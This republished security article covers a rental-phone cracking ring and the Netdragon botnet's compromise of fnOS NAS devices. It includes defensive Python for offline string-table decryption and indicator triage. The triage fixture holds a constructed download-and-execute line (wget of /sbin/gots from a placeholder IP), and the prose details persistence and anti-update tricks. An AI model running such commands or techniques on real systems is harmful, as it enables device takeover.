High Salaries Not Enough: 3 Big‑Tech Engineers Caught in fnOS Black‑Market Hacks
Police in Zhejiang dismantled a full-cycle black-market operation that acquired, cracked and resold rental smartphones, arresting three highly paid engineers from major internet firms who earned more than ten million yuan by breaking the devices' management locks; the case illustrates both the technical methods involved and the legal consequences. A separate section below covers the February 2026 compromise of fnOS private-cloud devices by the Netdragon botnet.
In the recent "Net Clean 2025" operation, Zhejiang police uncovered a complete "acquire, crack, resell" chain targeting rental smartphones and arrested 17 suspects, among them three core technical staff from well-known internet companies. Each of the three already earned an annual salary above ¥500,000, yet made more than ¥10 million by illegally cracking the management locks on rental devices.
The criminal network was organized into clear roles: a procurement team sourced the devices, core engineers bypassed the rental‑phone management and location locks, and other members handled resale and profit distribution, with upstream actors developing the cracking tools.
Technical analysis shows the work went well beyond simple reflashing: the perpetrators bypassed device activation and remote-management binding, modified or replaced system components, disabled or spoofed communication with the backend, and blocked the rental platform's location-reporting and remote-control commands. That conduct amounts to illegal intrusion into, and sabotage of the functions of, computer information systems.
All three engineers held graduate degrees and worked at major tech firms in Shanghai and Hangzhou. According to police, they were not the masterminds but were recruited as "technical partners" motivated by extra income rather than necessity.
The case reflects common traits of high‑skill individuals in cyber‑gray markets: expertise in vulnerability exploitation, reverse engineering, and protocol cracking; deep knowledge of enterprise system architectures; strong anti‑forensic awareness; and a misjudgment of legal risks.
Police emphasized that technical skill does not put anyone above the law: the suspects were held on the strength of a complete evidence chain, without relying on any confession.
Digital‑rental services have become attractive targets because low‑cost devices are easy to acquire, resale channels are mature, and once the cracking process is modularized it can be scaled for high profit, surpassing traditional gray‑market returns.
Separately, in February 2026 the fnOS private-cloud system was compromised at scale by the Netdragon botnet. The attackers first planted an HTTP backdoor on internet-exposed devices that executed remote commands received as GET requests to an /api path on port 57132, then moved the listener to port 57199 to evade detection.
After gaining a foothold, the malware "cleaned the environment": it deleted log files (/var/log/*.log, /var/log/messages*, /var/log/audit/audit.log*) and the systemd journal, and rewrote /etc/hosts to map the official update domains (e.g., apiv2-liveupdate.fnnas.com) to 0.0.0.0, so update checks could no longer reach the vendor and neither firmware upgrades nor patches could be pulled. It also stopped the recovery services (sysrestore_service, backup_service) and removed the upgrade components, leaving the device unable to repair itself even once a fix was published.
Persistence was two-layered. In user space, commands appended to a startup script (system_startup.sh) downloaded and ran the second-stage payloads (/sbin/gots and /usr/bin/<botid>) and registered systemd services so they started at boot. In kernel space, a component was loaded as a module with an innocuous name (e.g., async_memcpys.ko); a later build also hid behind a unit at /etc/systemd/system/dockers.service, one letter away from the legitimate docker.service, to survive reboots.
The malware decrypted a string table with hard-coded keys and nonces; the recovered strings included markers such as "PWNED FROM NETDRAG" and C2 domains such as aura.kabot[.]icu. Because the key material is embedded in the binary, an analyst who lifts it can decrypt the same table statically. C2 traffic used a custom binary protocol with login, heartbeat, command-execution and DDoS frames, protected by a layered XOR and ChaCha20 scheme, and the C2 endpoints rotated across IP ranges (e.g., 45.95.*) and ports (3489, 5098, 6608, 7489).
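The following is an added example, not code from the malware or from any published analysis of it. It shows the static-recovery step the paragraph above implies: once the hard-coded key and nonce are lifted from the binary, the string table can be decrypted offline. ChaCha20 is implemented per RFC 8439 in pure Python so nothing beyond the standard library is needed. KEY, NONCE, XOR_KEY, the order of the two layers (XOR applied first, ChaCha20 on top) and the [u16 length][bytes] entry layout are all assumptions; the sample strings are constructed from indicators named in the article.

```python
"""Static recovery of a string table protected by a repeating-key XOR layer
under ChaCha20 with a hard-coded key and nonce.

Added example, not malware code. KEY, NONCE, XOR_KEY, the layer order and
the [u16 length][bytes] entry layout are assumptions standing in for values
an analyst would read out of the binary.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(v, n):
    return ((v << n) & MASK) | (v >> (32 - n))


def _quarter(s, a, b, c, d):
    # RFC 8439 quarter round on four words of the 16-word state.
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key, nonce, counter):
    """64-byte keystream block for a 32-byte key, 12-byte nonce, 32-bit counter."""
    state = (list(struct.unpack("<4I", b"expand 32-byte k"))
             + list(struct.unpack("<8I", key)) + [counter]
             + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):                      # 10 double rounds = 20 rounds
        _quarter(w, 0, 4, 8, 12); _quarter(w, 1, 5, 9, 13)
        _quarter(w, 2, 6, 10, 14); _quarter(w, 3, 7, 11, 15)
        _quarter(w, 0, 5, 10, 15); _quarter(w, 1, 6, 11, 12)
        _quarter(w, 2, 7, 8, 13); _quarter(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & MASK for x, y in zip(w, state)])


def chacha20_xor(key, nonce, data, counter=0):
    """Encrypt or decrypt; the XOR with the keystream is its own inverse."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, nonce, counter + off // 64)
        out += bytes(b ^ k for b, k in zip(data[off:off + 64], ks))
    return bytes(out)


def xor_layer(data, xkey):
    """Outer layer: repeating-key XOR (also self-inverse)."""
    return bytes(b ^ xkey[i % len(xkey)] for i, b in enumerate(data))


def pack_table(strings):
    """Assumed on-disk layout: [u16 little-endian length][utf-8 bytes] per entry."""
    return b"".join(struct.pack("<H", len(s.encode())) + s.encode() for s in strings)


def decrypt_table(blob, key, nonce, xkey):
    """Peel ChaCha20, then the XOR layer, then walk the length-prefixed entries."""
    table = xor_layer(chacha20_xor(key, nonce, blob), xkey)
    out, pos = [], 0
    while pos + 2 <= len(table):
        (n,) = struct.unpack_from("<H", table, pos)
        out.append(table[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
        pos += 2 + n
    return out


# Constructed stand-ins for the constants an analyst would lift from the binary.
KEY = bytes(range(32))
NONCE = bytes.fromhex("000000000000004a00000000")
XOR_KEY = b"\x5a\xa5\x3c\xc3\x0f\xf0\x96\x69"      # assumed 8-byte repeating outer key

# Constructed sample table using indicators named in the article.
SAMPLE_STRINGS = ["PWNED FROM NETDRAG", "aura.kabot[.]icu",
                  "/etc/systemd/system/dockers.service", "/sbin/gots"]
# How the table would sit in the binary: XOR layer applied first, ChaCha20 on top.
SAMPLE_BLOB = chacha20_xor(KEY, NONCE, xor_layer(pack_table(SAMPLE_STRINGS), XOR_KEY))

if __name__ == "__main__":
    for s in decrypt_table(SAMPLE_BLOB, KEY, NONCE, XOR_KEY):
        print(repr(s))
```

The point of the exercise is that a fixed key and nonce buy the author nothing against static analysis: the same few lines that the bot runs at start-up give the analyst the C2 domains and markers without ever executing the sample. A real build may differ in layer order, entry framing or counter start; those are the parameters to adjust when the first decrypted entry does not look like text.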
On receiving a DDoS command, the bot renamed system binaries (/usr/bin/cat), killed the monitoring services (network_service, resmon_service) and obfuscated its traffic, which made detection on the device difficult. Commands arrived through Telegram bots and HTTP APIs, and targets included entities in China, the US, Singapore, Australia and other regions.
Defenders released detection rules, which prompted rapid iteration of the malware: a build dated 31 January removed the iptables/nftables rules tagged "C2IP" (a label that detection rules could key on), encrypted its DDoS modules with ChaCha20, and added an 8-byte dynamic key wrapper. On 1 February the C2 ordered bots to delete rsa_private_key.pem, which risked breaking the device's encryption services.
Infected NAS devices could neither complete firmware upgrades nor run the vendor's security tools, so they stayed in a semi-controlled state and kept participating in the botnet. The incident was classified as the province's first large-scale IoT infrastructure hijacking.
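Because infected devices could not run the vendor's tools, triage has to be done from artifacts copied off the box (or over a shell) and checked elsewhere. The script below is an added example, not fnOS vendor code and not code recovered from the malware; it turns the indicators named in the article (vendor update domains pinned to 0.0.0.0, listeners on 57132/57199, sessions to 45.95.* or the listed C2 ports, /sbin/gots staged from system_startup.sh, the dockers.service impostor unit, the async_memcpys module, firewall rules tagged C2IP, a renamed /usr/bin/cat) into checks that run over captured text. Every sample artifact is constructed: the IPs, PIDs, download URL and the .bak suffix are placeholders, and the loopback variants accepted by the hosts check are an assumption beyond the 0.0.0.0 mapping the article reports.

```python
"""Offline triage for the Netdragon/fnOS indicators described in the text.

Added example, not vendor code and not malware code. Indicator values come
from the article; all sample artifacts below are constructed placeholders.
"""
import re

UPDATE_DOMAIN_SUFFIX = ".fnnas.com"           # vendor update domains the bot pins to 0.0.0.0
BACKDOOR_PORTS = {57132, 57199}               # HTTP backdoor listener ports
C2_NET, C2_PORTS = "45.95.", {3489, 5098, 6608, 7489}
STAGED_PATHS = ("/sbin/gots",)                # second-stage payload path
FAKE_UNITS = {"dockers.service"}              # impostor of the legitimate docker.service
FAKE_MODULES = {"async_memcpys"}              # disguised kernel module name
EXPECTED_BINARIES = ("/usr/bin/cat",)         # renamed by the bot before DDoS runs
_FETCH = re.compile(r"\b(curl|wget)\b.*\s(/sbin/|/usr/bin/)")   # download into a bin dir


def check_hosts(hosts_text):
    """Vendor domains mapped to 0.0.0.0 (loopback accepted as an assumed variant)."""
    hits = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 2 and fields[0] in ("0.0.0.0", "127.0.0.1", "::1"):
            hits += [n for n in fields[1:] if n.endswith(UPDATE_DOMAIN_SUFFIX)]
    return hits


def _sockets(ss_text):
    """Yield (state, local_port, peer_host, peer_port) from `ss -tnap`-style lines."""
    for line in ss_text.splitlines():
        f = line.split()
        if len(f) < 5 or f[0] not in ("LISTEN", "ESTAB"):
            continue
        _, lport = f[3].rsplit(":", 1)
        phost, pport = f[4].rsplit(":", 1)
        yield f[0], int(lport), phost, (int(pport) if pport.isdigit() else None)


def check_listeners(ss_text):
    return [p for st, p, _, _ in _sockets(ss_text) if st == "LISTEN" and p in BACKDOOR_PORTS]


def check_c2(ss_text):
    """Established sessions to the reported C2 range or C2 ports (either is a lead)."""
    return [f"{h}:{p}" for st, _, h, p in _sockets(ss_text)
            if st == "ESTAB" and (h.startswith(C2_NET) or p in C2_PORTS)]


def check_startup(script_text):
    """Lines of system_startup.sh that fetch into a bin dir or touch the staged payload."""
    return [l.strip() for l in script_text.splitlines()
            if any(p in l for p in STAGED_PATHS) or _FETCH.search(l)]


def check_units(unit_names):
    return sorted(set(unit_names) & FAKE_UNITS)


def check_modules(lsmod_text):
    rows = [l.split() for l in lsmod_text.splitlines()[1:]]      # skip lsmod header
    return [r[0] for r in rows if r and r[0] in FAKE_MODULES]


def check_iptables(rules_text):
    return [l for l in rules_text.splitlines() if "C2IP" in l]


def check_binaries(present_paths):
    return [p for p in EXPECTED_BINARIES if p not in present_paths]


def triage(a):
    """Run every check over a dict of captured artifacts; returns finding strings."""
    f = [f"update domain sinkholed in /etc/hosts: {d}" for d in check_hosts(a["hosts"])]
    f += [f"backdoor listener on port {p}" for p in check_listeners(a["ss"])]
    f += [f"established C2 session to {peer}" for peer in check_c2(a["ss"])]
    f += [f"startup script stages payload: {l}" for l in check_startup(a["startup"])]
    f += [f"impostor systemd unit: {u}" for u in check_units(a["units"])]
    f += [f"suspicious kernel module: {m}" for m in check_modules(a["lsmod"])]
    f += [f"firewall rule tagged C2IP: {r}" for r in check_iptables(a["iptables"])]
    f += [f"system binary missing or renamed: {p}" for p in check_binaries(a["present"])]
    return f


# Constructed artifacts: IPs, PIDs, the URL and the .bak name are placeholders, not real IOCs.
INFECTED_HOST = {
    "hosts": "127.0.0.1 localhost\n0.0.0.0 apiv2-liveupdate.fnnas.com   # added by bot\n",
    "ss": 'LISTEN 0 4096 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=700,fd=3))\n'
          'LISTEN 0 128 0.0.0.0:57199 0.0.0.0:* users:(("gots",pid=2311,fd=5))\n'
          'ESTAB 0 0 192.168.1.20:41022 45.95.1.2:6608 users:(("gots",pid=2311,fd=7))\n',
    "startup": "#!/bin/sh\nmount -a\n"
               "wget -qO /sbin/gots http://45.95.0.1/gots && chmod +x /sbin/gots\n/sbin/gots &\n",
    "units": ["ssh.service", "dockers.service"],
    "lsmod": "Module Size Used by\nasync_memcpys 16384 0\nxt_tcpudp 20480 2\n",
    "iptables": "-A INPUT -s 45.95.1.2/32 -m comment --comment C2IP -j ACCEPT\n",
    "present": {"/usr/bin/ls", "/usr/bin/cat.bak"},
}
CLEAN_HOST = {
    "hosts": "127.0.0.1 localhost\n",
    "ss": 'LISTEN 0 4096 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=700,fd=3))\n',
    "startup": "#!/bin/sh\nmount -a\n",
    "units": ["ssh.service", "docker.service"],
    "lsmod": "Module Size Used by\nxt_tcpudp 20480 2\n",
    "iptables": "-A INPUT -i lo -j ACCEPT\n",
    "present": {"/usr/bin/ls", "/usr/bin/cat"},
}

if __name__ == "__main__":
    for name, host in ("infected", INFECTED_HOST), ("clean", CLEAN_HOST):
        print(name, triage(host) or "no findings")
```

Two caveats follow from the article itself. The bot renames /usr/bin/cat and kills the monitoring services, so collect the artifacts with tools the bot has no reason to touch (`ss`, `lsmod`, `iptables-save`, a copy of /etc/hosts and the startup script) and inspect them off-device. And since the C2IP tag was dropped in the 31 January build, an empty result from check_iptables on its own says nothing; the hosts sinkhole and the staged payload are the more durable signals.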
The fnOS vendor responded on 12 February with a comprehensive security bulletin that acknowledged a fundamental security flaw, released patches, disabled the relay service for devices that had not upgraded, hardened default configurations, and committed to a security development lifecycle (SDL) with regular audits. The statement framed this as a "fix first, notify later" approach intended to reduce risk while the patch rolled out.
From a governance perspective, the incident exposed systemic shortcomings: the vulnerability existed in earlier releases and was reported in forums but not treated as high‑risk; users received insufficient early warnings; and transparency around infection scale and data exfiltration remains lacking. Sustainable security requires clear vulnerability grading, mandatory code audits, minimal exposure defaults, and offline emergency patch capabilities to prevent future large‑scale IoT hijackings.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
Black & White Path